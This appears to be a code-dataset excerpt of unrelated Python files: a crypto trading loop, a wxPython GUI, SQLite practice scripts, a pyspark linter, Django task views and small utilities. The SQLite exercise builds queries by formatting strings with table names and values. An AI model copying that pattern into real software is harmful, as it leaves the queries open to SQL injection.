(self.prices[-1] + 1)\n\t\t\t\t#self.logger.info('TRADE sets tradePrice {} since prices[-5:] are {}'.format(tradePrice, list(self.prices)[-5:]))\n\t\t\t\t#self.logger.info('TRADE tradePrice updated to {}'.format(tradePrice))\n\t\t\t\tglobalTrendTrading = True\n\t\t\t\twhile self.tradeAmount >= self.lowerAmountLimit:\n\t\t\t\t\tif self.bull:\n\t\t\t\t\t\tif self.state == 'BEAR':\n\t\t\t\t\t\t\tself.logger.info('TRADE state flip BULL -> BEAR, trade thread will stop BUY and start to SELL.')\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif self.cfgLogOnly:\n\t\t\t\t\t\t\t\tif minutes != datetime.datetime.now().minute:\n\t\t\t\t\t\t\t\t\tminutes = datetime.datetime.now().minute\n\t\t\t\t\t\t\t\t\tself.logger.info('TRADE BUY {} {} at {}. Since in logOnlyMode, buy nothing.'.format(\n\t\t\t\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), tradePrice))\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\ttradeInfo = self.traderTrend.trade(symbol = self.symbol, type = 'buy', price = tradePrice, amount = self.tradeAmount)\n\t\t\t\t\t\t\torderID = tradeInfo['order_id']\n\t\t\t\t\t\t\tself.logger.info(tradeInfo)\n\t\t\t\t\t\t\tself.logger.info('TRADE BUY {} {} at {}, orderID: {}'.format(\n\t\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), tradePrice, orderID))\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.state == 'BULL':\n\t\t\t\t\t\t\tself.logger.info('TRADE state flip BEAR -> BULL, trade thread will stop SELL and start to BUY.')\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif self.cfgLogOnly:\n\t\t\t\t\t\t\t\tif minutes != datetime.datetime.now().minute:\n\t\t\t\t\t\t\t\t\tminutes = datetime.datetime.now().minute\n\t\t\t\t\t\t\t\t\tself.logger.info('TRADE SELL {} {} at {}. Since in logOnlyMode, sell nothing.'.format(\n\t\t\t\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), tradePrice))\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\ttradeInfo = self.traderTrend.trade(symbol = self.symbol, type = 'sell', price = tradePrice, amount = self.tradeAmount)\n\t\t\t\t\t\t\torderID = tradeInfo['order_id']\n\t\t\t\t\t\t\tself.logger.info(tradeInfo)\n\t\t\t\t\t\t\tself.logger.info('TRADE SELL {} {} at {}, orderID: {}'.format(\n\t\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), tradePrice, orderID))\n\n\t\t\t\t\ttime.sleep(0.2)\n\t\t\t\t\tself.traderTrend.cancel_order(symbol = self.symbol, order_id = orderID)\n\n\t\t\t\t\torder = None\n\t\t\t\t\twhile order == None or order['status'] == 4:\n\t\t\t\t\t\torder = self.account.order_info(symbol = self.symbol, order_id = orderID)['orders'][0]\n\t\t\t\t\t\tself.logger.info('TRADE {} status {}'.format(orderID, statusTexts[order['status']]))\n\n\t\t\t\t\tself.logger.info('TRADE TRADING: {} at price {}, amount: {}, dealamout: {}'.format(\n\t\t\t\t\t\t\t\t\t 'buy' if self.bull else 'sell',\n\t\t\t\t\t\t\t\t\t tradePrice,\n\t\t\t\t\t\t\t\t\t self.tradeAmount,\n\t\t\t\t\t\t\t\t\t order['deal_amount']\n\t\t\t\t\t\t\t\t\t ))\n\t\t\t\t\tself.tradeAmount -= order['deal_amount']\n\t\t\t\t\tif self.tradeAmount > self.lowerAmountLimit:\n\t\t\t\t\t\tself.tradeAmount -= 0.01\n\t\t\t\t\t\tself.tradeAmount *= 0.98\n\n\t\t\t\t\tif order['status'] == -1:\n\t\t\t\t\t\tself.updateOrderbook()\n\t\t\t\t\t\twhile self.bull and self.bidPrice - tradePrice > 1:\n\t\t\t\t\t\t\tself.tradeAmount *= 0.99\n\t\t\t\t\t\t\ttradePrice += 1\n\t\t\t\t\t\twhile self.bear and self.askPrice - tradePrice < -1:\n\t\t\t\t\t\t\tself.tradeAmount *= 0.99\n\t\t\t\t\t\t\ttradePrice -= 1\n\t\t\t\tself.numTick = 0 # new trade is start\n\t\t### End of tradeHelper() ###\n\t\tminutes = 0\n\t\twhile True:\n\t\t\tif self.bull or self.bear:\n\t\t\t\ttradeHelper(self, minutes)\n\nclass Slark:\n\tdef trade(exch, symbol, cfg):\n\t\tslarkCancelLegacy \t= SlarkCancelLegacy(exch, logging.INFO, symbol, cfg, 'SlarkCancelLegacy')\n\t\tslarkTrend \t\t\t\t\t= SlarkTrend(exch, logging.INFO, symbol, cfg, 'SlarkTrend')\n\t\tslarkBalancePosition= SlarkBalancePosition(exch, logging.INFO, symbol, cfg, 'SlarkBalancePosition')\n\t\ttry:\n\t\t\t#with ThreadPoolExecutor(max_workers=3) as executor:\n\t\t\t#\texecutor.submit(slarkTrend.trade)\n\t\t\t#\texecutor.submit(slarkBalancePosition.trade)\n\t\t\t#\texecutor.submit(slarkCancelLegacy.trade)\n\t\t\twith ThreadPoolExecutor(max_workers=2) as executor:\n\t\t\t\t#executor.submit(slarkCancelLegacy.trade)\n\t\t\t\texecutor.submit(slarkTrend.trade)\n\t\t\t\texecutor.submit(slarkTrend.generateSignal)\n\t\texcept Exception as e:\n\t\t\tlogger = createLogger('Slark', logging.INFO)\n\t\t\tlogger.critical(e)\n\t\t\tlogger.critical(traceback.format_exc())\n\t\t\tlogger.critical('status')\n\t\t\tinsts = [slarkBalancePosition, slarkCancelLegacy, slarkTrend]\n\t\t\tfor inst in insts:\n\t\t\t\tfor item in inst.__dict__.items():\n\t\t\t\t\tinst.logger.critical('self.%s: %s'%(item[0], str(item[1])))\n\t\t\n","sub_path":"btcTradingSystem/OKCoin/Code/SlarkMultithreadInstance/1theFirstTradedVersion/slark.py","file_name":"slark.py","file_ext":"py","file_size_in_byte":19903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"615334032","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nfrom DimensionListCtrl import DimensionListCtrl\nfrom GoalPage import GoalPage\nfrom ConcernAssociationListCtrl import ConcernAssociationListCtrl\n\nclass SummaryPage(wx.Panel):\n def __init__(self,parent,refiningGoal):\n wx.Panel.__init__(self,parent,armid.GOAL_PANELSUMMARY_ID)\n topSizer = wx.BoxSizer(wx.VERTICAL)\n\n topRowSizer = wx.BoxSizer(wx.HORIZONTAL)\n topSizer.Add(topRowSizer,0,wx.EXPAND)\n\n lblBox = wx.StaticBox(self,-1,'Label')\n lblBoxSizer = wx.StaticBoxSizer(lblBox,wx.VERTICAL)\n topRowSizer.Add(lblBoxSizer,0,wx.EXPAND)\n self.labelCtrl = wx.TextCtrl(self,armid.GOAL_TEXTLABEL_ID,\"\",pos=wx.DefaultPosition,size=wx.Size(150,30),style=wx.TE_READONLY)\n self.labelCtrl.Disable()\n lblBoxSizer.Add(self.labelCtrl,1,wx.EXPAND)\n\n catBox = wx.StaticBox(self,-1,'Category')\n catBoxSizer = wx.StaticBoxSizer(catBox,wx.VERTICAL)\n topRowSizer.Add(catBoxSizer,1,wx.EXPAND)\n\n\n catList = ['Achieve','Maintain','Avoid','Improve','Increase','Maximise','Minimise']\n self.categoryCtrl = wx.ComboBox(self,armid.GOAL_COMBOCATEGORY_ID,choices=catList,size=wx.DefaultSize,style= wx.CB_READONLY)\n catBoxSizer.Add(self.categoryCtrl,1,wx.EXPAND)\n\n priBox = wx.StaticBox(self,-1,'Priority')\n priBoxSizer = wx.StaticBoxSizer(priBox,wx.VERTICAL)\n topSizer.Add(priBoxSizer,0,wx.EXPAND)\n priList = ['Low','Medium','High']\n self.priorityCtrl = wx.ComboBox(self,armid.GOAL_COMBOPRIORITY_ID,choices=priList,size=wx.DefaultSize,style= wx.CB_READONLY)\n priBoxSizer.Add(self.priorityCtrl,1,wx.EXPAND)\n\n defBox = wx.StaticBox(self,-1,'Definition')\n defBoxSizer = wx.StaticBoxSizer(defBox,wx.VERTICAL)\n topSizer.Add(defBoxSizer,1,wx.EXPAND)\n self.definitionCtrl = wx.TextCtrl(self,armid.GOAL_TEXTDEFINITION_ID,'',style= wx.TE_MULTILINE)\n defBoxSizer.Add(self.definitionCtrl,1,wx.EXPAND)\n\n if (refiningGoal == True):\n ctBox = wx.StaticBox(self,-1,'Contribution Type')\n ctBoxSizer = wx.StaticBoxSizer(ctBox,wx.HORIZONTAL)\n topSizer.Add(ctBoxSizer,0,wx.EXPAND)\n self.ctCtrl = wx.ComboBox(self,armid.GOAL_COMBOCONTRIBUTIONTYPE_ID,choices=['Operationalises','Obstructs'],size=wx.DefaultSize,style=wx.CB_READONLY)\n self.ctCtrl.SetSelection(0)\n ctBoxSizer.Add(self.ctCtrl,1,wx.EXPAND)\n\n self.SetSizer(topSizer)\n\nclass MLTextPage(wx.Panel):\n def __init__(self,parent,winId):\n wx.Panel.__init__(self,parent)\n topSizer = wx.BoxSizer(wx.VERTICAL)\n\n narrativeBox = wx.StaticBox(self,-1)\n narrativeBoxSizer = wx.StaticBoxSizer(narrativeBox,wx.HORIZONTAL)\n topSizer.Add(narrativeBoxSizer,1,wx.EXPAND)\n self.narrativeCtrl = wx.TextCtrl(self,winId,'',style=wx.TE_MULTILINE)\n narrativeBoxSizer.Add(self.narrativeCtrl,1,wx.EXPAND)\n self.SetSizer(topSizer)\n\nclass ConcernAssociationPage(wx.Panel):\n def __init__(self,parent,winId,dp):\n wx.Panel.__init__(self,parent)\n topSizer = wx.BoxSizer(wx.VERTICAL)\n\n caBox = wx.StaticBox(self,-1)\n caBoxSizer = wx.StaticBoxSizer(caBox,wx.HORIZONTAL)\n topSizer.Add(caBoxSizer,1,wx.EXPAND)\n self.caList = ConcernAssociationListCtrl(self,winId,dp)\n caBoxSizer.Add(self.caList,1,wx.EXPAND)\n self.SetSizer(topSizer)\n\nclass ConcernPage(wx.Panel):\n def __init__(self,parent,winId,dp):\n wx.Panel.__init__(self,parent)\n topSizer = wx.BoxSizer(wx.VERTICAL)\n\n sgBox = wx.StaticBox(self,-1)\n sgBoxSizer = wx.StaticBoxSizer(sgBox,wx.HORIZONTAL)\n topSizer.Add(sgBoxSizer,1,wx.EXPAND)\n self.concernList = DimensionListCtrl(self,winId,wx.DefaultSize,'Concern','asset',dp)\n sgBoxSizer.Add(self.concernList,1,wx.EXPAND)\n self.SetSizer(topSizer)\n\n\nclass GoalEnvironmentNotebook(wx.Notebook):\n def __init__(self,parent,dp,refiningGoal=False):\n wx.Notebook.__init__(self,parent,armid.GOAL_NOTEBOOKENVIRONMENT_ID)\n p1 = SummaryPage(self,refiningGoal)\n p2 = MLTextPage(self,armid.GOAL_TEXTFITCRITERION_ID)\n p3 = MLTextPage(self,armid.GOAL_TEXTISSUE_ID)\n p4 = GoalPage(self,armid.GOAL_LISTGOALREFINEMENTS_ID,True,dp)\n p5 = GoalPage(self,armid.GOAL_LISTSUBGOALREFINEMENTS_ID,False,dp)\n p6 = ConcernPage(self,armid.GOAL_LISTCONCERNS_ID,dp)\n p7 = ConcernAssociationPage(self,armid.GOAL_LISTCONCERNASSOCIATIONS_ID,dp)\n self.AddPage(p1,'Definition')\n self.AddPage(p2,'Fit Criterion')\n self.AddPage(p3,'Issue')\n self.AddPage(p4,'Goals')\n self.AddPage(p5,'Sub-Goals')\n self.AddPage(p6,'Concerns')\n self.AddPage(p7,'Concern Associations')\n","sub_path":"cairis/cairis/GoalEnvironmentNotebook.py","file_name":"GoalEnvironmentNotebook.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"350779000","text":"'''\n\n新進測試\n\n'''\n\nprint('------------------------------------------------------------')\t#60個\nprint('準備工作')\n\nimport sqlite3\n\ndef show_data_base_contents(db_filename, table_name, length):\n conn = sqlite3.connect(db_filename) # 建立資料庫連線\n sqlstr = 'SELECT * FROM {};'.format(table_name)#same\n sqlstr = 'SELECT * FROM %s' % table_name\n cursor = conn.execute(sqlstr)\n\n n = 0\n for row in cursor:\n print(row)\n n = n + 1\n #讀取 N 筆資料, 即跳出\n if n == length:\n break\n conn.close() # 關閉資料庫連線\n\ndef show_data_base_contents_all(db_filename, table_name):\n conn = sqlite3.connect(db_filename) # 建立資料庫連線\n sqlstr = 'SELECT * FROM {};'.format(table_name)#same\n sqlstr = 'SELECT * FROM %s' % table_name\n results = str(conn.execute(sqlstr).fetchall())\n print(results)\n conn.close() # 關閉資料庫連線\n\nprint('------------------------------------------------------------')\t#60個\n\nprint('新進測試')\n\n\ndb_filename = 'ims_sql/db_ims.sqlite'\ndb_filename = 'C:/_git/vcs/_1.data/______test_files1/_db/gasoline.sqlite'\n#db_filename = 'db_20230703_113217.sqlite'\n\nprint('建立資料庫連線, 資料庫 : ' + db_filename)\nconn = sqlite3.connect(db_filename) # 建立資料庫連線\n\nprint('要事先能知道表單的名稱 prices 與 各欄位的名稱 gdate')\n\ncursor = conn.execute('SELECT * FROM prices ORDER BY gdate DESC;')\n\nn = 0\nfor row in cursor:\n print(row)\n print(\"日期:{},92無鉛:{},95無鉛:{},98無鉛:{}\". format(row[0], row[1], row[2], row[3]))\n n = n + 1\n #讀取10筆資料, 即跳出\n if n == 5:\n break\n\nconn.close() # 關閉資料庫連線\n\nprint('-------------------')\ntable_name = 'prices'\nlength = 5\nshow_data_base_contents(db_filename, table_name, length)\nprint('-------------------')\nshow_data_base_contents_all(db_filename, table_name)\n\n#----------------------------------------------------------------\n\n\n'''\n\n新進測試\n測試 SERIAL 測不出效果\n\n測試 TIMESTAMP\n測試 DATE\n測試 CHECK\n\n測試部分填入資料\n\n'''\n\nprint('------------------------------------------------------------')\t#60個\nprint('新進測試')\n\nimport sqlite3\nimport datetime\n\ndb_filename = 'sssss4.sqlite'\n\nprint('建立資料庫連線, 資料庫 : ' + db_filename)\nconn = sqlite3.connect(db_filename) # 建立資料庫連線\ncursor = conn.cursor() # 建立 cursor 物件\n\nsqlstr = '''\nCREATE TABLE IF NOT EXISTS table01 (\n --id SERIAL PRIMARY KEY, 無效\n id_num INTEGER,\n name VARCHAR(50),\n birthday DATE CHECK(birthday > '1900-01-01'),\n work_time DATE CHECK(work_time > birthday),\n money INTEGER CHECK(money > 0), -- 預設錯誤時會顯示\n update_time TIMESTAMP\n);\n'''\n\ncursor.execute(sqlstr)\nconn.commit() # 更新\n\nid_num = 3\nname = 'David'\nbirthday = '2006-03-11'\nwork_time = '2023-07-11'\nmoney = 2345\nupdate_time = datetime.datetime.now()\n\nsql = \"INSERT INTO table01 (id_num, name, birthday, work_time, money, update_time) VALUES ({}, '{}', '{}', '{}', {}, '{}')\"\n#print(sql)\nsqlstr = sql.format(id_num, name, birthday, work_time, money, update_time)\n\n#或者直接寫\n#sqlstr = \"INSERT INTO table01 (id_num, name, birthday, work_time, money) VALUES (5, 'David', 'xxxx', 'xxxx', 1234, 'xxxx');\"\n\ncursor.execute(sqlstr)\n\nprint('資料不足時, 部分填入資料')\nid_num = 5\nname = 'Eric'\nupdate_time = datetime.datetime.now()\n\nsql = \"INSERT INTO table01 (id_num, name, update_time) VALUES ({}, '{}', '{}')\"\n#print(sql)\nsqlstr = sql.format(id_num, name, update_time)\ncursor.execute(sqlstr)\n\nconn.commit() # 更新\nconn.close() # 關閉資料庫連線\n\nconn = sqlite3.connect(db_filename) # 建立資料庫連線\n\ncursor = conn.execute('SELECT * FROM table01')\n\nn = 0\nfor row in cursor:\n print(row)\n n = n + 1\n #讀取10筆資料, 即跳出\n\nconn.close() # 關閉資料庫連線\n\n\nprint('------------------------------------------------------------')\t#60個\nprint('一次寫入多行的語法 executescript')\n\nimport sqlite3\nimport datetime\n\ndb_filename = 'sssss4_many1.sqlite'\n\nprint('建立資料庫連線, 資料庫 : ' + db_filename)\nconn = sqlite3.connect(db_filename) # 建立資料庫連線\ncursor = conn.cursor() # 建立 cursor 物件\nconn.execute(\"CREATE virtual TABLE table01 using fts3(name, ingredients)\")\nconn.executescript(\"\"\"\n INSERT INTO table01 (name, ingredients) VALUES ('broccoli stew', 'broccoli peppers cheese tomatoes');\n INSERT INTO table01 (name, ingredients) VALUES ('pumpkin stew', 'pumpkin onions garlic celery');\n INSERT INTO table01 (name, ingredients) VALUES ('broccoli pie', 'broccoli cheese onions flour');\n INSERT INTO table01 (name, ingredients) VALUES ('pumpkin pie', 'pumpkin sugar flour butter');\n \"\"\")\n\nfor row in conn.execute(\"SELECT rowid, name, ingredients FROM table01 WHERE name MATCH 'pie'\"):\n print(row)\n\n#conn.commit() # 更新\n\ntable_name = 'table01'\nshow_data_base_contents_all(db_filename, table_name)\n\n\nprint('------------------------------------------------------------')\t#60個\nprint('一次寫入多行的語法 executescript')\n\nimport sqlite3\n\ncon = sqlite3.connect(\":memory:\")\ncur = con.cursor()\ncur.executescript(\"\"\"\n CREATE TABLE person(\n firstname,\n lastname,\n age\n );\n\n CREATE TABLE book(\n title,\n author,\n published\n );\n\n INSERT INTO book(title, author, published)\n VALUES (\n 'Dirk Gently''s Holistic Detective Agency',\n 'Douglas Adams',\n 1987\n );\n \"\"\")\n\nprint('------------------------------------------------------------')\t#60個\nprint('xxxxx')\n\nimport sqlite3\n\ncon = sqlite3.connect(\":memory:\")\ncur = con.cursor()\ncur.execute(\"CREATE TABLE people (name_last, age)\")\n\nwho = 'David'\nage = 18\n\ncur.execute(\"INSERT INTO people VALUES (?, ?)\", (who, age))\n\n\nprint('------------------------------------------------------------')\t#60個\nprint('xxxxx')\n\n\n\nprint(\"程式執行完畢!\")\n\n","sub_path":"_4.python/sqlite/sqlite_新進測試1.py","file_name":"sqlite_新進測試1.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"401308673","text":"import re\n\n\nMETA_FIELDS = ('AUTHOR','VERSION','DESC','REPO','URL')\n\nclass Module():\n \n def __init__(self,position,uid,tags={}):\n\n if not isinstance(tags,dict):\n raise TypeError\n \n self.position = position \n self.uid = uid\n [setattr(self,field,tags.pop(field)) for field in META_FIELDS if (field in tags)]\n self.tags = tags\n\n @staticmethod\n def create_from_string(position,s):\n match_obj = re.findall(\"\"\"(?P^\\w+):(?P.+$)\"\"\",s,re.MULTILINE)\n attr = { i[0]:i[1] for i in match_obj}\n print(attr)\n module = Module(position,attr.pop('ID'),tags=attr)\n return module\n\n\n","sub_path":"src/core/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"371377115","text":"# Copyright 2017 Palantir Technologies, Inc.\nimport ast\nimport logging\nfrom pyls import hookimpl, lsp\n\nlog = logging.getLogger(__name__)\n\n@hookimpl\ndef pyls_settings():\n # Default pydocstyle to disabled\n return {'plugins': {'pyspark': {'enabled': False}}}\n\n@hookimpl\ndef pyls_lint(config, document):\n config.plugin_settings('pyspark')\n log.debug(\"Running pyspark lint.\")\n\n try:\n tree = ast.parse(document.source, document.path)\n except SyntaxError:\n return None\n\n ast.fix_missing_locations(tree)\n diags = []\n spark_methods_require_shuffle = [\n 'repartition',\n 'coalesce',\n 'cogroup',\n 'sortByKey',\n 'aggregateByKey',\n 'reduceByKey',\n 'groupByKey',\n 'join',\n ]\n for node in ast.walk(tree):\n if isinstance(node, ast.Attribute):\n if hasattr(node, 'attr') and node.attr in spark_methods_require_shuffle:\n diags.append({\n 'source': 'pyspark',\n 'range': {\n 'start': {'line': node.lineno - 1, 'character': node.col_offset},\n 'end': {'line': node.lineno - 1, 'character': node.col_offset + 14},\n },\n 'message': 'Repartition is expensive.',\n 'severity': lsp.DiagnosticSeverity.Warning\n })\n\n return diags\n","sub_path":"pyls/plugins/pyspark_lint.py","file_name":"pyspark_lint.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"628948489","text":"n = int(input())\nlimit = list(map(int, input().split()))\nm = int(input())\nweight = list(map(int, input().split()))\n\nlimit.sort(reverse=True)\nweight.sort(reverse=True)\n\nif weight[0] > limit[0]:\n print(-1)\nelse:\n ans = 0\n while weight:\n ans += 1\n for x in limit:\n if not weight:\n break\n\n for y in weight:\n if x >= y:\n weight.remove(y)\n break\n print(ans)","sub_path":"problem_solving/2021/210608/210608_4.py","file_name":"210608_4.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"121015975","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rtiapp', '0009_auto_20180622_1550'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='alumno',\n name='pais',\n field=models.CharField(max_length=3, default='ESP', choices=[('ESP', 'España'), ('GTM', 'Guatemala'), ('ECU', 'Ecuador'), ('CAN', 'Canarias')]),\n ),\n migrations.AlterField(\n model_name='evaluador',\n name='pais',\n field=models.CharField(max_length=3, default='ESP', choices=[('ESP', 'Espa��a'), ('GTM', 'Guatemala'), ('ECU', 'Ecuador'), ('CAN', 'Canarias')]),\n ),\n ]\n","sub_path":"rtiapp/migrations/0010_auto_20180622_1607.py","file_name":"0010_auto_20180622_1607.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"283488843","text":"import json\n\nfin = open('laba24/in.json','r')\nfout = open('laba24/out.json','w')\n\ntasks = json.loads(fin.read())\n\nusers = {}\nfor task in tasks:\n if task['userId'] not in users:\n users[task['userId']] = 0\n if task['completed']:\n users[task['userId']] += 1\n\noutput = []\nfor user in users:\n output.append({'userId':user, 'task_completed':users[user]})\n\njson.dump(output, fout, indent=2)","sub_path":"laba24/laba24.py","file_name":"laba24.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"607774395","text":"from django.shortcuts import redirect, render\nfrom .models import *\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import CurrentForm\nfrom django.contrib import messages\n\nimport datetime\nimport xlwt\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\n\n\n\ndef about(request):\n \n return render(request, 'task/dashboard/about.html')\n# Create your views here.\n\n@login_required\ndef index(request):\n comp_tasks_count = Current.objects.filter(status='Completed').count()\n del_tasks_count = Current.objects.filter(status='Deleted').count()\n curr_tasks_count = Current.objects.filter(status='Current').count()\n context = {\n 'comp_tasks_count': comp_tasks_count,\n 'del_tasks_count': del_tasks_count,\n 'curr_tasks_count': curr_tasks_count,\n }\n return render(request, 'task/dashboard/index.html', context)\n\n\n@login_required\ndef current(request):\n curr_tasks = Current.objects.filter(status='Current')\n curr_tasks_count = curr_tasks.count()\n\n del_tasks_count = Current.objects.filter(status='Deleted').count()\n comp_tasks_count = Current.objects.filter(status='Completed').count()\n \n if request.method == \"POST\":\n form = CurrentForm(request.POST)\n if form.is_valid():\n form.save()\n task_name = form.cleaned_data.get('task')\n messages.success(request, f'{task_name} has been added')\n \n return redirect('dashboard-current')\n else:\n form = CurrentForm()\n\n context = {\n 'comp_tasks_count': comp_tasks_count,\n 'del_tasks_count': del_tasks_count,\n 'curr_tasks': curr_tasks,\n 'curr_tasks_count': curr_tasks_count,\n 'form': form,\n }\n return render(request, 'task/dashboard/current.html', context)\n\n\n@login_required\n# Current update and delete\ndef current_delete(request, pk):\n curr_del = Current.objects.get(id=pk)\n if request.method == \"POST\":\n curr_del.delete()\n return redirect('dashboard-current')\n\n return render(request, 'task/dashboard/current_delete.html')\n\n@login_required\ndef current_update(request, pk):\n curr_up = Current.objects.get(id=pk)\n if request.method == \"POST\":\n form = CurrentForm(request.POST, instance=curr_up)\n if form.is_valid():\n form.save()\n return redirect('dashboard-current')\n else:\n form = CurrentForm(instance=curr_up)\n context = {\n 'form': form,\n }\n return render(request, 'task/dashboard/current_update.html', context)\n\n@login_required\n# Completed update and delete\ndef completed_delete(request, pk):\n comp_del = Current.objects.get(id=pk)\n if request.method == \"POST\":\n comp_del.delete()\n return redirect('dashboard-current')\n\n return render(request, 'task/dashboard/completed_delete.html')\n\n@login_required\ndef completed_update(request, pk):\n comp_up = Current.objects.get(id=pk)\n if request.method == \"POST\":\n form = CurrentForm(request.POST, instance=comp_up)\n if form.is_valid():\n form.save()\n return redirect('dashboard-current')\n else:\n form = CurrentForm(instance=comp_up)\n context = {\n 'form': form,\n }\n return render(request, 'task/dashboard/completed_update.html', context)\n\n@login_required\ndef completed(request):\n comp_tasks = Current.objects.filter(status='Completed')\n comp_tasks_count = comp_tasks.count()\n\n del_tasks_count = Current.objects.filter(status='Deleted').count()\n curr_tasks_count = Current.objects.filter(status='Current').count()\n\n\n \n context = {\n 'comp_tasks': comp_tasks,\n 'comp_tasks_count': comp_tasks_count,\n 'del_tasks_count': del_tasks_count,\n 'curr_tasks_count': curr_tasks_count,\n }\n return render(request, 'task/dashboard/completed.html', context)\n\n\n@login_required\ndef deleted(request):\n del_tasks = Current.objects.filter(status='Deleted')\n del_tasks_count = del_tasks.count()\n comp_tasks_count = Current.objects.filter(status='Completed').count()\n curr_tasks_count = Current.objects.filter(status='Current').count()\n\n context = {\n 'del_tasks': del_tasks,\n 'comp_tasks_count': comp_tasks_count,\n 'del_tasks_count': del_tasks_count,\n 'curr_tasks_count': curr_tasks_count,\n }\n \n return render(request, 'task/dashboard/deleted.html', context)\n\n@login_required\ndef export_excel(request, id):\n if id == 1: # current\n obj = Current\n obj_name = 'Current'\n elif id == 2: # completed\n obj = Completed\n obj_name = 'Completed'\n elif id == 3: # Deleted\n obj = Deleted\n obj_name = 'Deleted'\n else:\n print('no id')\n\n \n response=HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = f'attachment; filename={obj_name}.xls' \n \n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet(f'{obj_name} Tasks')\n row_num = 0\n\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n\n columns = ['task', 'user', 'date', 'status']\n\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style) # at 0 row 0 column \n\n curr_tasks = Current.objects.filter(status=f'{obj_name}').values_list('task', 'user', 'date', 'status')\n \n for row in curr_tasks:\n row_num += 1\n for col_num in range(len(row)):\n ws.write(row_num, col_num, row[col_num], font_style)\n \n wb.save(response)\n return response\n ","sub_path":"task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"249149071","text":"from django.db.models import fields\n\ndef get_changes_between_models(model1, model2, fields=[]):\n\tchanges = {}\n\tfor field in fields:\n\t\tif model1.__getattribute__(field) != model2.__getattribute__(field):\n\t\t\tchanges[field] = (model1._meta.get_field(field).value_from_object(model1), \n\t\t\t\t\t\t\t\tmodel2._meta.get_field(field).value_from_object(model2),)\n\treturn changes\n\ndef get_stats():\n\tfrom models import Issue\n\tfrom django.contrib.auth.models import User\n\tstats = {}\n\tstats['total_issues'] = Issue.objects.all().count()\n\tstats['open_issues'] = Issue.objects.open().count()\n\tstats['closed_issues'] = Issue.objects.closed().count()\n\tstats['total_users'] = User.objects.all().count()\n\treturn stats\n","sub_path":"coral/tracker/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"390691533","text":"from utils import min_image_dims_in_dir, shuffle_split_files\n\nmain_run = 'dims' # 'split'\n\n###################################\n# min_image_dims_in_dir #\n###################################\n\nif main_run == 'dims':\n # directory = '/Users/bothmena/Projects/datasets/vehicles_object_detection/yolo_v5/train/images/'\n directory = '/Users/bothmena/Projects/AIForMobility/datasets/yolo_labels/yolo_v3_to_v5/sample/input_images'\n width, height = min_image_dims_in_dir(directory, ['jpg'])\n\n print('min width = {} / min height = {}'.format(width, height))\n\n###################################\n# min_image_dims_in_dir #\n###################################\n\nif main_run == 'split':\n original_dir = '/Users/bothmena/Projects/datasets/vehicles_object_detection/yolo_v5/train'\n destination = '/Users/bothmena/Projects/datasets/vehicles_object_detection/yolo_v5_train_valid'\n\n shuffle_split_files([.8, .2], original_dir, destination)\n","sub_path":"utils/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"269095935","text":"from discord.ext import commands\n\n\nclass CogManager(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.last_reloaded = None\n\n @commands.command()\n @commands.has_permissions(administrator=True)\n async def load(self, ctx, *, module):\n \"\"\"Loads a module.\"\"\"\n await ctx.message.delete(delay=5.0)\n try:\n self.bot.load_extension(module)\n except commands.ExtensionError as err:\n await ctx.send_error(f'{err.__class__.__name__}: {err}', 